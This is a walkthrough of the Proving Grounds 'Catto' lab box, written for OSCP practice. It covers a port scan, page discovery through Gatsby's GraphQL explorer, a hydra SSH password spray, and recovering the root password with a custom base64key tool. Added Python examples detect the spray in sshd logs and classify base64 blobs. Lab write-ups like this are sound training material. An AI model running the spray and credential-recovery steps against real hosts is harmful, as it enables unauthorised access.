Proving grounds: Catto
Today we will take a look at Proving grounds: Catto. My purpose in sharing this post is to prepare for the OSCP exam, and to show you the way if you get stuck. Please try to understand each step and take notes.
- Network scan
8080/tcp open http nginx 1.14.1
|_http-title: Identity by HTML5 UP
|_http-server-header: nginx/1.14.1
18080/tcp open http Apache httpd 2.4.37 ((centos))
|_http-title: CentOS \xE6\x8F\x90\xE4\xBE\x9B\xE7\x9A\x84 Apache HTTP \xE6\x9C\x8D\xE5\x8A\xA1\xE5\x99\xA8\xE6\xB5\x8B\xE8\xAF\x95\xE9\xA1\xB5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
30330/tcp open http Node.js Express framework
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
|_http-cors: HEAD GET POST PUT DELETE PATCH
33097/tcp open http Node.js Express framework
|_http-title: Site doesn’t have a title (text/html; charset=utf-8).
|_http-cors: HEAD GET POST PUT DELETE PATCH
42022/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 cc:21:51:f2:c6:2a:ad:d6:ca:07:04:de:70:5f:fa:13 (RSA)
| 256 05:e4:90:d2:00:2b:9d:14:e3:9f:44:68:d2:8e:bc:dc (ECDSA)
|_ 256 ca:80:49:73:f0:c8:05:ae:bd:2b:42:37:1d:13:e0:71 (ED25519)
43821/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, ms-sql-s, oracle-tns:
| HTTP/1.1 400 Bad Request
|_ Connection: close
50400/tcp open http Node.js Express framework
- 30330
http://192.168.249.139:30330/minecraft
“There is a limit on the server, but at least sabel, yvette, zahara, sybilla, marcus, tabbatha and tabby are already online and building.”
└─# nano user.txt
sabel
yvette
zahara
sybilla
marcus
tabbatha
tabby
Built with Gatsby
After seeing this footer, I started researching Gatsby. Gatsby applications running in development mode (gatsby develop) expose a GraphiQL explorer at /___graphql, and the allSitePage collection in its schema lists every page path the site was built with, linked or not.
In the explorer, select allSitePage (nodes, path) and click run. One of the paths it returns:
http://192.168.249.139:30330/new-server-config-mc
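To make the step concrete, here is an added example (my own code, not from the write-up or from Gatsby) that shows the allSitePage query the explorer builds and how to pull the page paths out of the JSON it returns. The response body is constructed for the example; only the /minecraft and /new-server-config-mc paths come from the box, the other paths and the "linked" list are invented. The same function is useful on the defending side: run it against your own site after deployment, and if it returns anything at all, the dev server (not a production build) is what is serving the site.

```python
import json
from typing import Iterable, List

# The query GraphiQL generates when you tick allSitePage > nodes > path.
ALL_SITE_PAGE_QUERY = """
{
  allSitePage {
    nodes {
      path
    }
  }
}
"""

# Constructed sample response. A Gatsby dev server wraps results in
# {"data": {...}} like this; the paths are made up for the example except the
# two that appear in the write-up.
SAMPLE_RESPONSE = json.dumps({
    "data": {
        "allSitePage": {
            "nodes": [
                {"path": "/"},
                {"path": "/minecraft"},
                {"path": "/new-server-config-mc"},
                {"path": "/about"},
            ]
        }
    }
})


def site_page_paths(body: str) -> List[str]:
    """Return every page path contained in an allSitePage response body."""
    data = json.loads(body)
    nodes = data.get("data", {}).get("allSitePage", {}).get("nodes", [])
    return [node["path"] for node in nodes if "path" in node]


def unlinked_paths(body: str, linked: Iterable[str]) -> List[str]:
    """Paths the build knows about that no navigable link points at.

    `linked` is whatever you collected by crawling the site normally; anything
    left over is a page that exists only because the dev server disclosed it.
    """
    known = set(linked)
    return sorted(p for p in site_page_paths(body) if p not in known)


if __name__ == "__main__":
    # Invented list of paths reachable by following links from the home page.
    crawled = ["/", "/minecraft", "/about"]
    print("all pages:     ", site_page_paths(SAMPLE_RESPONSE))
    print("unlinked pages:", unlinked_paths(SAMPLE_RESPONSE, crawled))
```

Nothing here talks to the network; feed it the body you get from posting ALL_SITE_PAGE_QUERY to the /___graphql endpoint (or, when auditing your own deployment, the body of the error page you hope to get instead).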
- Hydra
hydra -L user.txt -p WallAskCharacter305 ssh://192.168.249.139:42022 -v
[42022][ssh] host: 192.168.249.139 login: marcus password: WallAskCharacter305
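From the blue-team side, a run like this is easy to spot in the SSH daemon's log: one source address fails against many different accounts within seconds, then one login succeeds. The following is an added example (my own code, not from the write-up) that parses constructed sshd syslog lines and raises an alert per source that failed against at least five distinct users inside a sixty-second window, reporting any account that was accepted from the same source. The log lines, timestamps, source addresses and thresholds are all invented for the example; only the usernames are the ones from the box.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed sshd lines modelling a single-password spray followed by one
# successful login, plus an unrelated single failure from another host.
SAMPLE_AUTH_LOG = """\
Mar 10 14:02:11 catto sshd[2140]: Failed password for invalid user sabel from 192.168.49.249 port 51234 ssh2
Mar 10 14:02:11 catto sshd[2142]: Failed password for invalid user yvette from 192.168.49.249 port 51236 ssh2
Mar 10 14:02:12 catto sshd[2144]: Failed password for invalid user zahara from 192.168.49.249 port 51238 ssh2
Mar 10 14:02:12 catto sshd[2146]: Failed password for invalid user sybilla from 192.168.49.249 port 51240 ssh2
Mar 10 14:02:13 catto sshd[2148]: Accepted password for marcus from 192.168.49.249 port 51242 ssh2
Mar 10 14:02:13 catto sshd[2150]: Failed password for invalid user tabbatha from 192.168.49.249 port 51244 ssh2
Mar 10 14:02:14 catto sshd[2152]: Failed password for invalid user tabby from 192.168.49.249 port 51246 ssh2
Mar 10 14:30:00 catto sshd[2300]: Failed password for marcus from 10.0.0.7 port 40000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)

# (timestamp, source ip, username, accepted?)
Event = Tuple[datetime, str, str, bool]


def parse_auth_log(log: str) -> List[Event]:
    """Turn sshd password-auth lines into events; unrelated lines are skipped."""
    events: List[Event] = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; only differences between them matter here
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"], m["result"] == "Accepted"))
    return events


def detect_spray(log: str, min_users: int = 5, window_s: int = 60) -> Dict[str, dict]:
    """Map each offending source ip to the users it failed against and any it got into.

    A source is flagged when failures against >= min_users distinct accounts fall
    inside any window_s-second span, which is the signature of one password tried
    across a user list rather than many passwords against one account.
    """
    by_ip: Dict[str, List[Event]] = defaultdict(list)
    for ev in parse_auth_log(log):
        by_ip[ev[1]].append(ev)

    alerts: Dict[str, dict] = {}
    for ip, evs in by_ip.items():
        evs.sort()
        failed = [e for e in evs if not e[3]]
        for i in range(len(failed)):  # sliding window anchored on each failure
            users = set()
            for j in range(i, len(failed)):
                if (failed[j][0] - failed[i][0]).total_seconds() > window_s:
                    break
                users.add(failed[j][2])
            if len(users) >= min_users:
                accepted = sorted({e[2] for e in evs if e[3]})
                alerts[ip] = {"users": sorted(users), "accepted": accepted}
                break
    return alerts


if __name__ == "__main__":
    for ip, info in detect_spray(SAMPLE_AUTH_LOG).items():
        print(f"spray from {ip}: {len(info['users'])} users tried, "
              f"accepted: {info['accepted'] or 'none'}")
```

The "accepted" list is what turns a noisy alert into an urgent one: a spray that ends in an Accepted password line means the credential is already burned and that account's sessions need to be reviewed, not just the source address blocked.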
- privesc (base64key)
[marcus@catto ~]$ cat .bash
F2jJDWaNin8pdk93RLzkdOTr60==
[marcus@catto ~]$ echo "F2jJDWaNin8pdk93RLzkdOTr60==" | base64 -d
f��)vOwD��t���
[marcus@catto ~]$ find / -type f -name "*base64*" 2>/dev/null
/usr/bin/base64
/usr/bin/base64key
[marcus@catto ~]$ /usr/bin/base64key -d F2jJDWaNin8pdk93RLzkdOTr60==
Usage: ./a.out message key (0:encrypt|1:decrypt)
./a.out "Hello world" MYPRIVATEKEY 0
./a.out ttz9JqxZHBClNtu= MYPRIVATEKEY 1
[marcus@catto ~]$ /usr/bin/base64key F2jJDWaNin8pdk93RLzkdOTr60== WallAskCharacter305 1
SortMentionLeast269
[marcus@catto ~]$ su -
Password:
[root@catto ~]# whoami
root
And now we are root.
"If you have any questions or comments, please do not hesitate to write. Have a good day."
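The lesson in this step is the triage, not the tool: the blob looks like base64, plain base64 -d produced binary junk, and that mismatch is the hint that the bytes were transformed with a key before being encoded (the leading carriage return in the decoded bytes is also why the terminal shows the output starting at "f" instead of at the first byte). Here is an added example (my own code, not from the write-up and not the base64key binary, whose algorithm is unknown to me) that automates exactly that check: it verifies a string is well-formed base64, decodes it, and measures how much of the payload is printable, so a blob found in a dotfile can be sorted into "readable text", "opaque payload" or "not base64 at all" before you go hunting for a custom decoder. The blob from the box and the "Hello world" sample are the only inputs taken from the page; the threshold is my choice.

```python
import base64
import binascii
import re
import string
from typing import Optional

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
# string.printable covers letters, digits, punctuation and ordinary whitespace
PRINTABLE = set(string.printable.encode("ascii"))


def decode_b64(blob: str) -> Optional[bytes]:
    """Strict base64 decode; None when the text is not well-formed base64."""
    if not B64_RE.match(blob) or len(blob) % 4:
        return None
    try:
        return base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII (0.0 for empty input)."""
    if not data:
        return 0.0
    return sum(b in PRINTABLE for b in data) / len(data)


def classify(blob: str, threshold: float = 0.95) -> str:
    """'not-base64', 'text' (decodes to readable bytes) or 'opaque'.

    'opaque' means well-formed base64 whose payload is not text: compressed or
    binary data, or bytes run through a keyed transform before encoding, which
    is the case the custom base64key tool on this box turned out to be.
    """
    raw = decode_b64(blob)
    if raw is None:
        return "not-base64"
    return "text" if printable_ratio(raw) >= threshold else "opaque"


if __name__ == "__main__":
    # The blob from marcus's dotfile, plus a constructed plain-text control.
    for sample in ("F2jJDWaNin8pdk93RLzkdOTr60==", "SGVsbG8gd29ybGQ=", "not base64!!"):
        raw = decode_b64(sample)
        ratio = printable_ratio(raw) if raw is not None else 0.0
        print(f"{sample:32} {classify(sample):11} printable={ratio:.2f}")
```

An "opaque" verdict is the cue the author followed: before trying to brute-force anything, look on the host for a non-standard tool that produced it (here, the find for *base64* turned up /usr/bin/base64key) and read its usage text, because a tool that needs a key usually means a key that was already leaked somewhere else on the box.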